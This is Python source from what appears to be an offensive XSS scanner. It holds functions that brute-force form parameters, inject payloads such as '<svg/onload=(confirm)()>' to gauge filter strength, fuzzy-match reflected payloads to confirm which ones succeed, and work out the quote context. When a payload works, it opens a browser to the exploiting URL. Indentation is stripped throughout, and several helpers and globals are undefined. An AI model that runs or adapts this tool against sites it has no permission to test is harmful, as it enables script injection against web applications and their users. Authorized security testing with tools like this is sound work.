def paramfinder(url, method, paranames, paravalues, xsschecker):
response = make_request(url, '', method)
matches = re.findall(
r'<input[^<]*name=\'[^<]*\'*>|<input[^<]*name="[^<]*"*>', response)
for match in matches:
try:
found_param = match.split('name=')[1].split(' ')[0].replace(
'\'', '').replace('"', '')
except UnicodeDecodeError:
continue
print(
'%s Heuristics found a potentially valid parameter: %s%s%s. Priortizing it.'
% (good, green, found_param, end))
if found_param in blind_params:
blind_params.remove(found_param)
blind_params.insert(0, found_param)
progress = 0
for param in blind_params:
progress = progress + 1
sys.stdout.write('\r%s Parameters checked: %i/%i' %
(run, progress, len(blind_params)))
sys.stdout.flush()
if param not in paranames:
if method == 'GET':
response = make_request(url, '?' + param + '=' + xsschecker,
method)
else:
response = make_request(url, param + '=' + xsschecker, method)
if ('\'%s\'' % xsschecker or '"%s"' % xsschecker
or ' %s ' % xsschecker) in response:
print('\n%s Valid parameter found : %s%s%s' %
(good, green, param, end))
paranames.append(param)
paravalues.append('')
def filter_checker(url, param_data, method, delay, xsschecker):
strength = '' # A variable for containing strength of the filter
# Injecting a malicious payload first by replacing xsschecker with our payload
try:
low_string = param_data.replace(xsschecker,
quote_plus('<svg/onload=(confirm)()>'))
sleep(
delay
) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
low_request = make_request(url, low_string, method)
if '<svg/onload=(confirm)()>' in low_request: # If payload was reflected in response
print("%s Filter Strength : %sLow or None%s" % (good, green, end))
print('%s Payload: <svg/onload=(confirm)()>' % good)
print('%s Efficiency: 100%%' % good)
choice = input(
'%s A payload with 100%% efficiency was found. Continue scanning? [y/N] '
% que).lower()
if choice == 'y':
pass
else:
if method == 'GET':
webbrowser.open(url + param_data.strip(xsschecker) +
'<svg/onload=(confirm)()>')
quit()
strength = 'low' # As a malicious payload was not filtered, the filter is weak
else: # If malicious payload was filtered (was not in the response)
# Now we will use a less malicious payload
medium_string = param_data.replace(xsschecker,
quote_plus('<zz onxx=yy>'))
sleep(
delay
) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
medium_request = make_request(url, medium_string, method)
if '<zz onxx=yy>' in medium_request:
print('%s Filter Strength : %sMedium%s' % (info, yellow, end))
strength = 'medium'
else: #Printing high since result was not medium/low
print('%s Filter Strength : %sHigh%s' % (bad, red, end))
strength = 'high'
return strength
except Exception as e:
print(e)
try:
print(
'%s Target doesn\'t seem to respond properly. Error Code: %s' %
(bad, re.search(r'\d\d\d', str(e)).group()))
except:
print('%s Target doesn\'t seem to respond properly.' % bad)
def test_param_check(payload_to_check, payload_to_compare, OCCURENCE_NUM, url,
param_data, method, action, cookie):
check_string = 'XSSSTART' + payload_to_check + 'XSSEND' # We are adding XSSSTART and XSSEND to make
compare_string = 'XSSSTART' + payload_to_compare + 'XSSEND' # the payload distinguishable in the response
param_data_injected = param_data.replace(xsschecker, check_string)
check_response = make_request(url, param_data_injected, method, cookie)
success = False
occurence_counter = 0 # Variable to keep track of which reflection is going through the loop
# Itretating over the reflections
for m in re.finditer('XSSSTART', check_response, re.IGNORECASE):
occurence_counter = occurence_counter + 1
efficiency = fuzz.partial_ratio(
check_response[m.start():m.start() + len(compare_string)].lower(),
compare_string.lower())
if efficiency == 100:
if action == 'do':
print('\n%s Payload: %s' % (good, payload_to_compare))
print('%s Efficiency: 100%%' % good)
choice = input(
'%s A payload with 100%% efficiency was found. Continue scanning? [y/N] '
% que).lower()
if choice == 'y':
pass
else:
if method == 'GET':
webbrowser.open(
url +
param_data.replace(xsschecker, payload_to_compare))
quit()
if occurence_counter == OCCURENCE_NUM:
success = True
break
if efficiency > 90 and action == 'do':
print('\n%s Payload: %s' % (good, payload_to_compare))
print('%s Efficiency: %s' % (good, efficiency))
try:
data_type = occur_location[OCCURENCE_NUM - 1]
if data_type == 'comment':
location_readable = 'inside a HTML comment '
elif data_type == 'html':
location_readable = 'as data or plaintext on the page'
elif data_type == 'script':
location_readable = 'as data in javascript'
elif data_type == 'attribute':
location_readable = 'as an attribute in a HTML tag'
print('%s Location: %s' % (good, location_readable))
break
except:
continue
return success
def which_quote(OCCURENCE_NUM, url, param_data, method, cookie):
check_string = 'ST4RTSSX' + xsschecker + '3NDSSX'
compare_string = 'ST4RTSSX' + xsschecker + '3NDSSX'
param_data_injected = param_data.replace(xsschecker, check_string)
try:
check_response = make_request(url, param_data_injected, method, cookie)
except:
check_response = ''
quote = ''
occurence_counter = 0
for m in re.finditer('ST4RTSSX', check_response, re.IGNORECASE):
occurence_counter += 1
if occurence_counter == OCCURENCE_NUM and (
check_response[(m.start() - 1):m.start()] == '\''
or check_response[(m.start() - 1):m.start()] == '"'):
return check_response[(m.start() - 1):m.start()]
elif occurence_counter == OCCURENCE_NUM:
return quote